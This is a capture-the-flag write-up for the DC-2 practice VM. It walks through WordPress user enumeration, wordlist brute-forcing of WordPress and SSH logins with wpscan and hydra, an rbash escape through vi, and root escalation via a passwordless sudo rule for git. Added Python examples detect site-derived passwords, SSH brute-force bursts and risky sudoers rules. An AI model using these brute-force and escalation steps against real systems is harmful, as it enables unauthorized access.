Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. As with the original DC-1, it’s designed with beginners in mind.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
Just like with DC-1, there are five flags including the final flag. The flags are important for beginners, but not so important for those who have experience.
In short, the only flag that really counts is the final flag.
I loved the previous box and I was excited to solve this. So, without further ado, let’s start with our basic nmap scan to find out the open ports and services.
```
root :: ~ » nmap -A -p- 192.168.43.140
Nmap scan report for DC-2 (192.168.43.140)
Host is up (0.00067s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.7.10
|_http-server-header: Apache/2.4.10 (Debian)
| http-title: DC-2 – Just another WordPress site
|_Requested resource was http://dc-2/
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey:
|   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
|   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
|   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_  256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
As you can see, there are two open ports: a WordPress installation on port 80 and an out-of-the-ordinary SSH service on port 7744 (it’s not the standard SSH port…). After visiting the site, I found a menu named “Flag”. We are going pretty fast!
The clue was obvious to me. There is a tool called “cewl”, which builds a wordlist of candidate passwords from the words found on the target’s own pages. I prepared my wordlist with the command below, where -d 3 sets the crawl depth and -w <file> writes the potential passwords to a file.
```
root :: /opt/cewl » ./cewl.rb -d 3 -w ~/Downloads/passwords.txt http://dc-2/
CeWL 5.4.5 (Exclusion) Robin Wood (firstname.lastname@example.org) (https://digi.ninja/)
root :: /opt/cewl » cd
root :: ~ » cd Downloads
root :: ~/Downloads » wc -c passwords.txt
1689 passwords.txt
```
I successfully gathered 1689 words, but the login page was yet to be discovered. I ran nikto just in case, and I haven’t even mentioned wpscan, an excellent tool for WordPress sites that can also brute-force the login page! Let’s see what turned up!
```
root :: ~ » wpscan --enumerate --url http://dc-2/
_______________________________________________________________
        WordPress Security Scanner by the WPScan Team
                       Version 2.9.4
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] URL: http://dc-2/
[+] Interesting header: LINK: <http://dc-2/index.php/wp-json/>; rel="https://api.w.org/"
[+] Interesting header: LINK: <http://dc-2/>; rel=shortlink
[+] Interesting header: SERVER: Apache/2.4.10 (Debian)
[+] XML-RPC Interface available under: http://dc-2/xmlrpc.php   [HTTP 405]
[+] Found an RSS Feed: http://dc-2/index.php/feed/   [HTTP 200]
[!] Detected 1 user from RSS feed:
+-------+
| Name  |
+-------+
| admin |
+-------+
[!] Includes directory has directory listing enabled: http://dc-2/wp-includes/

[+] Enumerating WordPress version ...
[+] WordPress version 4.7.10 (Released on 2018-04-03) identified from meta generator, links opml
[!] 10 vulnerabilities identified from the version number
--- snip ---

[+] Enumerating usernames ...
[+] We identified the following 3 users:
+----+-------+-------------+
| ID | Login | Name        |
+----+-------+-------------+
| 1  | admin | admin       |
| 2  | tom   | Tom Cat     |
| 3  | jerry | Jerry Mouse |
+----+-------+-------------+
[!] Default first WordPress username 'admin' is still used
--- snip ---
```
Well, it looks like we have more than one user to deal with. Let’s run wpscan again, but this time supply our custom password list. Here is the relevant information from the output:
```
root :: ~/Downloads » wpscan --url http://dc-2/ --wordlist passwords.txt
--- snip ---
[+] Starting the password brute forcer
  Brute Forcing 'admin' Time: 00:00:09 <===============  > (237 / 239) 99.16%  ETA: 00:00:00
  [+] [SUCCESS] Login : tom Password : parturient
  [+] [SUCCESS] Login : jerry Password : adipiscing
  Brute Forcing 'jerry' Time: 00:00:09 <===============  > (236 / 239) 98.74%  ETA: 00:00:00

  +----+-------+-------------+------------+
  | ID | Login | Name        | Password   |
  +----+-------+-------------+------------+
  | 1  | admin | admin       |            |
  | 2  | tom   | Tom Cat     | parturient |
  | 3  | jerry | Jerry Mouse | adipiscing |
  +----+-------+-------------+------------+
--- snip ---
```
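Both recovered passwords are plain words that cewl lifted from the site’s own filler text, which is exactly the weakness a password policy should catch. The following added example (my code, not part of the original writeup or of WordPress) extracts the word set from a constructed sample page the way cewl does and rejects any password whose alphabetic core is one of those words:

```python
import re
from html.parser import HTMLParser

# Constructed sample page (not fetched from DC-2): the Lorem-ipsum filler a
# fresh WordPress site ships with, which is exactly what CeWL harvests.
SAMPLE_PAGE = """
<html><head><title>DC-2 &ndash; Just another WordPress site</title>
<script>var x = "secretword";</script></head>
<body><p>Cum sociis natoque penatibus et magnis dis parturient montes,
nascetur ridiculus mus. Lorem ipsum dolor sit amet, consectetur
adipiscing elit.</p></body></html>
"""

class _TextExtractor(HTMLParser):
    """Collects visible text, skipping <script> and <style> contents."""
    def __init__(self):
        super().__init__()
        self.chunks, self._skip = [], False

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip = True

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._skip = False

    def handle_data(self, data):
        if not self._skip:
            self.chunks.append(data)

def site_words(html, min_len=3):
    """Lower-cased alphabetic words from the visible text; min_len=3 matches
    CeWL's default minimum word length."""
    parser = _TextExtractor()
    parser.feed(html)
    text = " ".join(parser.chunks)
    return {w.lower() for w in re.findall(r"[A-Za-z]+", text) if len(w) >= min_len}

def password_derived_from_site(password, words):
    """True if the password, minus any trailing digits/punctuation and ignoring
    case, is a word from the site's own text ('parturient', 'Adipiscing1!')."""
    core = re.sub(r"[^A-Za-z]+$", "", password).lower()
    return core in words
```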
We found two passwords out of three. Not bad, right? Time to log in… First, I logged in as tom but didn’t find anything useful, so I switched to jerry. With jerry’s account I found the next flag in a blog post.
I thought that searching for a working exploit or uploading a PHP reverse shell would be a waste of time. So, instead of doing all that, I tried to brute-force the SSH service with the same wordlist and the three usernames (I saved them to a text file).
```
root :: ~ » nvim users.txt
root :: ~ » hydra -L users.txt -P ~/Downloads/passwords.txt ssh://dc-2:7744
Hydra v8.9.1 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 714 login tries (l:3/p:238), ~45 tries per task
[DATA] attacking ssh://dc-2:7744/
[STATUS] 170.00 tries/min, 170 tries in 00:01h, 546 to do in 00:04h, 16 active
[STATUS] 124.67 tries/min, 374 tries in 00:03h, 342 to do in 00:03h, 16 active
[ssh] host: dc-2   login: tom   password: parturient
1 of 1 target successfully completed, 1 valid password found
```
I got lucky with tom, because he re-used his WordPress password for SSH…
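From the server’s side, that hydra run is a burst of failed sshd logins from one source against several accounts, followed by an accepted login, and moving sshd to port 7744 did nothing to hide it from a full port scan. The added example below (my code, not from the original post) runs a sliding-window detector over constructed sshd syslog lines, assuming Debian’s default auth.log message format, and reports sources whose burst was followed by a successful login:

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd syslog lines (not taken from the DC-2 box), in Debian's
# default auth.log format: one source hammers three accounts, then logs in.
SAMPLE_AUTH_LOG = """\
Mar  3 12:01:01 DC-2 sshd[1201]: Failed password for invalid user admin from 192.168.43.1 port 50112 ssh2
Mar  3 12:01:02 DC-2 sshd[1202]: Failed password for tom from 192.168.43.1 port 50113 ssh2
Mar  3 12:01:02 DC-2 sshd[1203]: Failed password for jerry from 192.168.43.1 port 50114 ssh2
Mar  3 12:01:03 DC-2 sshd[1204]: Failed password for tom from 192.168.43.1 port 50115 ssh2
Mar  3 12:01:05 DC-2 sshd[1206]: Accepted password for tom from 192.168.43.1 port 50117 ssh2
Mar  3 12:30:00 DC-2 sshd[1300]: Failed password for jerry from 10.0.0.9 port 40001 ssh2
Mar  3 12:31:00 DC-2 sshd[1301]: Accepted publickey for jerry from 10.0.0.9 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def detect_bruteforce(log_text, threshold=4, window_s=60):
    """Map source IP -> finding for sources with `threshold` failed logins inside
    `window_s` seconds; a success from that source after the burst is flagged."""
    failures, successes = defaultdict(list), defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        when = datetime.strptime(m["ts"], "%b %d %H:%M:%S")  # syslog has no year
        if m["result"] == "Failed":
            failures[m["ip"]].append((when, m["user"]))
        else:
            successes[m["ip"]].append((when, m["user"], m["method"]))
    findings = {}
    for ip, events in failures.items():
        events.sort()
        # Slide a window of `threshold` failures; the first span inside window_s is a hit.
        for i in range(len(events) - threshold + 1):
            start, end = events[i][0], events[i + threshold - 1][0]
            if (end - start).total_seconds() <= window_s:
                findings[ip] = {
                    "failures": len(events),
                    "accounts": sorted({u for _, u in events}),
                    "success_after_burst": [(u, meth) for t, u, meth in successes[ip] if t >= end],
                }
                break
    return findings
```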
```
root :: ~ » ssh tom@dc-2 -p 7744
The authenticity of host '[dc-2]:7744 ([192.168.43.140]:7744)' can't be established.
ECDSA key fingerprint is SHA256:ZbyT03GNDQgEmA5AMiTX2N685NTzZuOoyMDIA+DW1qU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[dc-2]:7744,[192.168.43.140]:7744' (ECDSA) to the list of known hosts.
tom@dc-2's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$
```
The default shell for tom was rbash, a restricted shell that we want to escape to gain better control over the system. I read about different techniques and decided to try a trick with the vi editor.
```
tom@DC-2:~$ -rbash: /dev/null: restricted: cannot redirect output
bash: _upvars: `-a0': invalid number specifier
-rbash: /dev/null: restricted: cannot redirect output
bash: _upvars: `-a0': invalid number specifier
tom@DC-2:~$ vi
```
Inside the editor, I typed :set shell=/bin/sh and finally :shell, which launches the standard Unix shell. After that, we can issue the /bin/bash command to switch to the Bash shell. I also noticed that we were limited in usable commands because the $PATH environment variable only contained /home/tom/usr/bin. So, I added the missing directories and printed out the third flag.
```
$ /bin/bash
tom@DC-2:~$ echo $PATH
/home/tom/usr/bin
tom@DC-2:~$ export PATH=/bin/:/usr/bin/:/usr/local/bin:$PATH
tom@DC-2:~$ ls
flag3.txt  usr
tom@DC-2:~$ cat flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
```
I have to admit, these hints are getting out of hand 😁
I switched to jerry’s account using the previously acquired WordPress password. The fourth flag was in the home directory.
```
tom@DC-2:~$ su jerry
Password:
jerry@DC-2:/home/tom$ cd
jerry@DC-2:~$ ls
flag4.txt
jerry@DC-2:~$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet.

You still need to get the final flag (the only flag that really counts!!!).

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!
```
We got a pretty obvious hint again. I checked the allowed commands with sudo -l, and yes, we can indeed run the git command as root without knowing the root password.
```
jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
```
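A passwordless sudo rule for a program that hands the terminal to a pager or editor is effectively a root shell, and because the rule above lists git without arguments, any arguments (such as a help subcommand) are allowed. This added example (my code, not from the writeup) audits /etc/sudoers-style rules for NOPASSWD entries, flagging commands listed without pinned arguments and binaries from an assumed starting list of such interactive helpers:

```python
import re

# Constructed /etc/sudoers excerpt (the box only shows the `sudo -l` view of
# jerry's rule); the rsync rule is there for contrast, with pinned arguments.
SAMPLE_SUDOERS = """\
Defaults env_reset, mail_badpass
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
root    ALL=(ALL:ALL) ALL
jerry   ALL=(root) NOPASSWD: /usr/bin/git
backup  ALL=(root) NOPASSWD: /usr/bin/rsync -a /var/www/ /srv/backup/
%admin  ALL=(ALL) ALL
"""

# Programs that hand the terminal to a pager or editor with a shell escape;
# the writeup shows `git help` and `vi` doing so. Assumed starting list.
INTERACTIVE_HELPERS = {"git", "vi", "vim"}

# user host=(runas) [TAG: ...] command[, command...]   (no line continuations)
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)

def audit_sudoers(text):
    """Return one finding per command in every NOPASSWD rule. A command listed
    without arguments may be run with ANY arguments (sudoers semantics), and an
    interactive helper run that way is a passwordless root shell."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "Defaults")):
            continue
        m = RULE_RE.match(line)
        if not m or "NOPASSWD:" not in m["tags"]:
            continue
        for cmd in m["cmds"].split(","):
            cmd = cmd.strip()
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            findings.append({
                "user": m["who"],
                "runas": m["runas"],
                "command": cmd,
                "any_arguments": " " not in cmd,   # no arguments pinned in the rule
                "interactive_helper": binary in INTERACTIVE_HELPERS,
            })
    return findings
```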
git displays its help pages in a pager, from which we can execute arbitrary commands. I chose to simply spawn a Bash shell. Finally, I printed out the final flag.
```
jerry@DC-2:~$ sudo git help status
root@DC-2:/home/jerry#
root@DC-2:/home/jerry# cd
root@DC-2:~# ls
final-flag.txt
root@DC-2:~# cat final-flag.txt
[ASCII-art "Well done" banner omitted]

Congratulations!!!

A special thanks to all those who sent me tweets and provided me with feedback - it's all greatly appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.
```